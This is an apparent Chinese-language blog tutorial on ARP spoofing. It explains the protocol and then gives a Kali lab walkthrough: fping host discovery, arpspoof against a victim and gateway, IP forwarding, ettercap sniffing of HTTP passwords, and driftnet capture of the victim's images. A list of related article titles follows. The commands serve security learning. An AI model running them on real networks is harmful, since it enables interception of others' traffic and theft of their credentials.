網路安全測試---ARP欺騙
一. ARP欺騙
目錄
1. ARP協議
ARP協議是“Address Resolution Protocol”(地址解析協議)的縮寫。我們知道在區域網中,網路以“幀”的形式傳輸資料。一個主機要和另一個主機進行直接通訊,必須要知道目標主機的MAC地址,目標主機的MAC地址理應就包含在資料幀中。顯然在雙方通訊之初,傳送方是無法知道目標MAC地址的,它的獲得就是通過地址解析這個過程。所謂“地址解析”就是主機在傳送幀前將目標IP地址轉換成目標MAC地址的過程。ARP協議的基本功能就是通過目標裝置的IP地址,查詢目標裝置的MAC地址,以保證通訊的順利進行。
2. 什麼是ARP攻擊
ARP欺騙是一類地址欺騙類病毒,屬於木馬病毒,自身不具備主動傳播的特性,不會自我複製。但是由於其發作的時候會不斷向全網傳送偽造的ARP資料包,導致網路無法正常執行,嚴重的甚至可能帶來整個網路的癱瘓。
此外,黑客還會通過這種攻擊手段竊取使用者密碼,如盜取QQ密碼、盜取各種網路遊戲密碼和賬號、盜竊網上銀行賬號,給使用者造成了很大的不便和巨大的經濟損失。因此,它的危害比一些蠕蟲病毒還要厲害。
電腦感染ARP病毒後的表現為:網速時快時慢,極其不穩定,區域網內頻繁性區域或整體掉線,重啟計算機或網路裝置後恢復正常;網上銀行、遊戲及QQ賬號的頻繁丟失。隨著加密技術的不斷提高,ARP病毒在盜取使用者賬號、密碼時遇到了很大的難度。於是又出現了一類新的ARP病毒,該類ARP病毒保留了ARP病毒的基本功能,即向全網傳送偽造的ARP欺騙廣播,將自身偽裝成閘道器。在此基礎上,對使用者發出的HTTP請求訪問進行修改,在其中插入惡意網址連結,使用者在不知情的情況下點選這些連結時,木馬病毒就會利用系統漏洞種植到使用者電腦中,從而使使用者電腦感染病毒。
ARP攻擊圖解:
| 1. PC2 向 PC1傳送ARP協議,欺騙PC1自己是閘道器 2. PC1把流量轉向PC2 3. PC2向閘道器傳送ARP協議欺騙閘道器自己是PC1 4. 閘道器傳送響應包給PC2 5. PC2傳送響應包給PC1 |
閘道器IP為: 192.168.127.2 PC1 : 192.168.127.100 PC2 : 192.168.127.200 |
3. 環境搭建
1. 虛擬機器內操作 2. Kali虛擬機器 3. 隨意一臺虛擬機器,最好Windows |
4. 安裝arpspoof
5. Kali操作
檢視區域網存活IP :
fping –a –g 192.168.127.x/24 -a: 顯示結果 -g:使用掩碼查詢
傳送ARP欺騙給對方主機:
arpspoof -i eth0 -t 192.168.127.172 192.168.127.2
開啟流量轉發功能,否則受害機不能上網
echo 1 > /proc/sys/net/ipv4/ip_forward
6. 竊取賬號密碼
開啟Ettercap,竊取目標主機輸入的賬號密碼(只能探嗅HTTP)
ettercap -Tq -i eth0
測試:
http://106.225.138.11:8088
7. Driftnet安裝
檢視受害主機瀏覽的圖片
apt-get install driftnet
如果出現安裝失敗等情況
請更換國內源 https://www.perfcode.com/p/kali-sources.html
8. Driftnet引數說明
引數說明: -b 捕獲到新的圖片時發出嘟嘟聲 -i interface 選擇監聽介面 -f file 讀取一個指定pcap資料包中的圖片 -p 不讓所監聽的介面使用混雜模式 -a 後臺模式:將捕獲的圖片儲存到目錄中(不會顯示在螢幕上) -m number 指定儲存圖片數的數目 -d directory 指定儲存圖片的路徑 -x prefix 指定儲存圖片的字首名 |
9. Driftnet操作
ARP欺騙切換到 –T 圖片模式
arpspoof -t 192.168.127.172 192.168.127.2 -i eth0
儲存圖片到桌面dir:
driftnet -i eth0 -a -d dir
相關文章
- 網路滲透測試實驗(2)之欺騙
- Kali 實現區域網 ARP 欺騙和 ARP 攻擊
- DNS欺騙和ARP欺騙是什麼?有何區別?DNS
- 網路安全中有哪些常見的欺騙方式?
- ARP欺騙防禦工具arpon
- 網路欺騙技術 (轉)
- Python寫ARP區域網主機存活掃描與ARP欺騙工具Python
- WindowsServer入門系列21防範ARP欺騙WindowsServer
- 安全之——郵件欺騙
- 網路欺騙工具Ettercap大學霸IT達人
- 網路駭客欺騙執行木馬的方法!(轉)
- 初探堆疊欺騙之靜態欺騙
- 樹莓派上使用KickThemOut對區域網內的裝置進行ARP欺騙樹莓派
- 網路安全滲透測試
- 再探堆疊欺騙之動態欺騙
- 使用Outlook欺騙性雲附件進行網路釣魚
- 什麼是欺騙性網路釣魚?如何防禦?
- Linux獨享主機繫結IP和MAC地址,防止ARP欺騙LinuxMac
- 欺騙機器學習模型機器學習模型
- DNS欺騙(轉)DNS
- 知物由學 | 未來安全隱患:AI的軟肋——故意欺騙神經網路AI神經網路
- 欺騙神經網路:建立你自己的對抗樣本神經網路
- LLMNR欺騙工具Responder
- 詳述網路中ARP安全的綜合功能
- 一篇故事講述了計算機網路裡的基本概念:閘道器,DHCP,IP定址,ARP欺騙,路由,DDOS等......計算機網路路由
- 【論文】網路安全與入門-ARP攻擊
- 工業網際網路網路安全滲透測試技術研究
- 網路對抗技術——網路嗅探與欺騙(第一二部分)非平臺
- 攻擊欺騙防禦技術在網路攻防實戰中的演化
- 網路測試
- Google開源網路流量安全測試工具nogotofailGoAI
- Google 開源網路流量安全測試工具 nogotofailGoAI
- 欺騙防禦技術新功能:用郵件資料欺騙攻擊者
- 軟體解決顯示卡欺騙器,HDMI欺騙器,如何使用ToDesk免費功能
- 網路安全滲透測試分為哪幾類?網路安全好就業嗎?就業
- DNS欺騙:網站克隆實現網站釣魚攻擊DNS網站
- 網路安全滲透測試的型別!滲透測試入門教程型別
- 【網路安全】軟體測試和滲透測試有什麼區別?